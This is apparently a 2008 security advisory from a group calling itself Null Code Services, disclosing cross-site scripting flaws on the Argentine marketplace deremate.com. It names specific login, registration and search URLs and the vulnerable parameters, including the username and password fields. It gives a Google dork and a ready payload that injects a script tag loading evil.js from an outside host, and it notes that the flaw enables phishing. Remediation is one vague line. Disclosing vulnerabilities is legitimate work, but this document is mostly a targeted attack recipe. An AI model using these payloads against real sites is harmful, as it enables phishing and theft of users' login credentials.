[ www.nullcode.com.ar ] 

+==========================================================================+
+          Deremate.com  security compromised with XSS/ RFI flaw           +
+==========================================================================+


Author(s): Ivan Sanchez 

Product:deremate.com 

Web:http://www.deremate.com/

Versions,sites affected: Copyright © 1999-2006 DeRemate.com  


Date: 24/08/2008


On Deremate Domain Sites Allows Phishing  and others security compromised with XSS/ RFI/ flaw...



GOOGLE DORKS:
------------

"deremate.com"



Domains affected part I:
------------------------

http://afiliados.deremate.com.ar/login.asp
http://afiliados.deremate.com.ar/registro/registro-particular-t1.asp
http://afiliados.deremate.com.ar/registro/registro-empresa-t1.asp

(there are  other links vulnerables)


Parameters affected:
--------------------

txtIDUsuario
txtContrasena


Evil code to input into parameter:  "><script src=http://site/scripts/evil.js></script> 



Domain affected  part II:
-------------------------

http://www.deremate.com.ar/cafe/runSearch.asp

(there are  other links vulnerables)


Parameters affected:
--------------------

toSearch

Evil code to input into parameter:   "><script src=http://site/scripts/evil.js></script> 



Remediation: review and then sanitized all internal code.
------------



NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+       Deremate security compromised with XSS/ RFI flaw                   +
+==========================================================================+